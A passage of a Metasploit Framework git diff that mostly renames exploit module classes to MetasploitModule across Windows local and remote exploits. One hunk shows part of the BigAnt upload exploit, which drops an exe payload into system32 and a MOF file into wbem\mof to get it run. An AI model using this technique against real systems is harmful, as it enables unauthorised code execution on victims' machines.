Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index eaab094978..97c19714e1 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -11,7 +11,7 @@ require 'msf/core/post/windows/process' require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/post/windows/services' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 8648ea1dac..28b51ccb19 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Windows::Process diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index d719b37e3a..ff010ea276 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -11,7 +11,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/windows/registry' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking diff --git a/modules/exploits/windows/local/powershell_cmd_upgrade.rb b/modules/exploits/windows/local/powershell_cmd_upgrade.rb index 8a8b4bc1bc..b3258d5b41 100644 --- a/modules/exploits/windows/local/powershell_cmd_upgrade.rb +++ b/modules/exploits/windows/local/powershell_cmd_upgrade.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::Powershell diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb index 30ad2442b7..ac63c1c122 100644 --- a/modules/exploits/windows/local/powershell_remoting.rb +++ b/modules/exploits/windows/local/powershell_remoting.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb index 9bf0d99c53..9ec2c9df0b 100644 --- a/modules/exploits/windows/local/ppr_flatten_rec.rb +++ b/modules/exploits/windows/local/ppr_flatten_rec.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/pxeexploit.rb b/modules/exploits/windows/local/pxeexploit.rb index 5830e98536..746a8bdc81 100644 --- a/modules/exploits/windows/local/pxeexploit.rb +++ b/modules/exploits/windows/local/pxeexploit.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::TFTPServer diff --git a/modules/exploits/windows/local/registry_persistence.rb b/modules/exploits/windows/local/registry_persistence.rb index 6efe4a89dc..77dc63224d 100644 --- a/modules/exploits/windows/local/registry_persistence.rb +++ b/modules/exploits/windows/local/registry_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' require 'msf/core/post/file' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/run_as.rb b/modules/exploits/windows/local/run_as.rb index 122e0262f3..27d43d5cb9 100644 --- a/modules/exploits/windows/local/run_as.rb +++ b/modules/exploits/windows/local/run_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Post::Windows::Runas include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 40a4dc77e1..f5c11bf244 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Local register_options( [ OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']), - OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', '0']), + OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', 0]), OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['event', 'lock', 'logon', 'schedule', 'unlock']]), OptString.new('REXENAME', [false, 'Name of exe on remote system']), OptString.new('RTASKNAME', [false, 'Name of task on remote system']), diff --git a/modules/exploits/windows/local/service_permissions.rb b/modules/exploits/windows/local/service_permissions.rb index 5f182feb70..6d80118ba9 100644 --- a/modules/exploits/windows/local/service_permissions.rb +++ b/modules/exploits/windows/local/service_permissions.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/trusted_service_path.rb b/modules/exploits/windows/local/trusted_service_path.rb index dcea5907f9..9ac1b902f0 100644 --- a/modules/exploits/windows/local/trusted_service_path.rb +++ b/modules/exploits/windows/local/trusted_service_path.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/virtual_box_guest_additions.rb b/modules/exploits/windows/local/virtual_box_guest_additions.rb index fc78d7e63f..0f4af645c4 100644 --- a/modules/exploits/windows/local/virtual_box_guest_additions.rb +++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb index 22a5db2c6e..5aa74dbfa1 100644 --- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb +++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking DEVICE = '\\\\.\\VBoxGuest' diff --git a/modules/exploits/windows/local/vss_persistence.rb b/modules/exploits/windows/local/vss_persistence.rb index f02c1e5a6c..ae7a9a89ed 100644 --- a/modules/exploits/windows/local/vss_persistence.rb +++ b/modules/exploits/windows/local/vss_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb index 3f6a75d772..a57469af53 100644 --- a/modules/exploits/windows/local/wmi.rb +++ b/modules/exploits/windows/local/wmi.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/lotus/domino_http_accept_language.rb b/modules/exploits/windows/lotus/domino_http_accept_language.rb index c806bb71d6..d7aa39f5d0 100644 --- a/modules/exploits/windows/lotus/domino_http_accept_language.rb +++ b/modules/exploits/windows/lotus/domino_http_accept_language.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb index f5876e4d5e..15c6f3465b 100644 --- a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb +++ b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb index f86f06cf09..0152389d2e 100644 --- a/modules/exploits/windows/lotus/domino_sametime_stmux.rb +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lotus/lotusnotes_lzh.rb b/modules/exploits/windows/lotus/lotusnotes_lzh.rb index 95cc18d40f..c81eba5b73 100644 --- a/modules/exploits/windows/lotus/lotusnotes_lzh.rb +++ b/modules/exploits/windows/lotus/lotusnotes_lzh.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # needs client interaction and permanent listener # diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index 2696dfd9cf..783fc8ec7c 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index 56f7267fc3..aa57ae65e4 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/saplpd.rb b/modules/exploits/windows/lpd/saplpd.rb index c41eccb25d..e370868b86 100644 --- a/modules/exploits/windows/lpd/saplpd.rb +++ b/modules/exploits/windows/lpd/saplpd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index ee2d364df6..6e5354b7e5 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/achat_bof.rb b/modules/exploits/windows/misc/achat_bof.rb index 7a53dee238..378dcd3d7a 100644 --- a/modules/exploits/windows/misc/achat_bof.rb +++ b/modules/exploits/windows/misc/achat_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/actfax_raw_server_bof.rb b/modules/exploits/windows/misc/actfax_raw_server_bof.rb index 2cf6fd756e..970804766e 100644 --- a/modules/exploits/windows/misc/actfax_raw_server_bof.rb +++ b/modules/exploits/windows/misc/actfax_raw_server_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking diff --git a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb index 8fcdb9e6d8..64aa24d4a0 100644 --- a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb +++ b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/allmediaserver_bof.rb b/modules/exploits/windows/misc/allmediaserver_bof.rb index 0d02343531..2ecd64761c 100644 --- a/modules/exploits/windows/misc/allmediaserver_bof.rb +++ b/modules/exploits/windows/misc/allmediaserver_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb index 383d1e5503..5d41f38d8d 100644 --- a/modules/exploits/windows/misc/altiris_ds_sqli.rb +++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb index dfa2e33ca2..a18abfeb57 100644 --- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb +++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index 5f4aaf27a6..ef8ca5f737 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb index 70c5c32675..163488bdd5 100644 --- a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb +++ b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/avidphoneticindexer.rb b/modules/exploits/windows/misc/avidphoneticindexer.rb index d61bc8c168..b73941ecee 100644 --- a/modules/exploits/windows/misc/avidphoneticindexer.rb +++ b/modules/exploits/windows/misc/avidphoneticindexer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index f7ef75924e..33623a6a2e 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bcaaa_bof.rb b/modules/exploits/windows/misc/bcaaa_bof.rb index 6647a2e608..b83075517a 100644 --- a/modules/exploits/windows/misc/bcaaa_bof.rb +++ b/modules/exploits/windows/misc/bcaaa_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server.rb b/modules/exploits/windows/misc/bigant_server.rb index a63b9bd4fa..a485c3f977 100644 --- a/modules/exploits/windows/misc/bigant_server.rb +++ b/modules/exploits/windows/misc/bigant_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index 49e364a014..2cfbdcfe73 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb +++ b/modules/exploits/windows/misc/bigant_server_250.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index c064c4be86..2a727d37ea 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp @@ -96,26 +96,26 @@ class Metasploit3 < Msf::Exploit::Remote mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") + print_status("Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ - print_good("#{peer} - #{exe_name} uploaded successfully") + print_good("#{exe_name} uploaded successfully") else if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ - print_error("#{peer} - Upload failed, check the DEPTH option") + print_error("Upload failed, check the DEPTH option") end fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{exe_name}") end - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") + print_status("Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ - print_good("#{peer} - #{mof_name} uploaded successfully") + print_good("#{mof_name} uploaded successfully") register_file_for_cleanup(exe_name) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") else if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ - print_error("#{peer} - Upload failed, check the DEPTH option") + print_error("Upload failed, check the DEPTH option") end fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}") end diff --git a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb index 4bf8ff8fcf..e0fd894ab6 100644 --- a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb +++ b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_usv.rb b/modules/exploits/windows/misc/bigant_server_usv.rb index 9db3b25a2f..fa53f1bdc9 100644 --- a/modules/exploits/windows/misc/bigant_server_usv.rb +++ b/modules/exploits/windows/misc/bigant_server_usv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bomberclone_overflow.rb b/modules/exploits/windows/misc/bomberclone_overflow.rb index 1bc230ad4c..55a2bb646b 100644 --- a/modules/exploits/windows/misc/bomberclone_overflow.rb +++ b/modules/exploits/windows/misc/bomberclone_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb index 2f5d35ae39..c792582b39 100644 --- a/modules/exploits/windows/misc/bopup_comm.rb +++ b/modules/exploits/windows/misc/bopup_comm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/borland_interbase.rb b/modules/exploits/windows/misc/borland_interbase.rb index 0da0bbad83..c994706c67 100644 --- a/modules/exploits/windows/misc/borland_interbase.rb +++ b/modules/exploits/windows/misc/borland_interbase.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/borland_starteam.rb b/modules/exploits/windows/misc/borland_starteam.rb index e354c56925..d744dd9c5f 100644 --- a/modules/exploits/windows/misc/borland_starteam.rb +++ b/modules/exploits/windows/misc/borland_starteam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/citrix_streamprocess.rb b/modules/exploits/windows/misc/citrix_streamprocess.rb index 4ddb6beb1f..b67a2c6433 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb index f64248b583..e67cc1e95e 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb index 31ed2b4605..5d48e0a692 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb index 66d3145b80..373922133a 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb index 2d36e4ee08..8741273ee4 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/doubletake.rb b/modules/exploits/windows/misc/doubletake.rb index 9130d3ad0a..388c996923 100644 --- a/modules/exploits/windows/misc/doubletake.rb +++ b/modules/exploits/windows/misc/doubletake.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index c5cc523440..bcc0102e7b 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index ba6caf4a42..5e7b5c8e0b 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb index f3d90b8117..b5c78fb561 100644 --- a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb +++ b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index 9c59408ddc..8d61c18476 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 084c331db4..df7c0adc8e 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_isc_attach_database.rb b/modules/exploits/windows/misc/fb_isc_attach_database.rb index f0ccc69f63..d913136f3b 100644 --- a/modules/exploits/windows/misc/fb_isc_attach_database.rb +++ b/modules/exploits/windows/misc/fb_isc_attach_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_isc_create_database.rb b/modules/exploits/windows/misc/fb_isc_create_database.rb index d85485c26a..2bcac14761 100644 --- a/modules/exploits/windows/misc/fb_isc_create_database.rb +++ b/modules/exploits/windows/misc/fb_isc_create_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index fca3bb11bf..db3949ec51 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/gimp_script_fu.rb b/modules/exploits/windows/misc/gimp_script_fu.rb index 2fa4784861..d5e6c095ef 100644 --- a/modules/exploits/windows/misc/gimp_script_fu.rb +++ 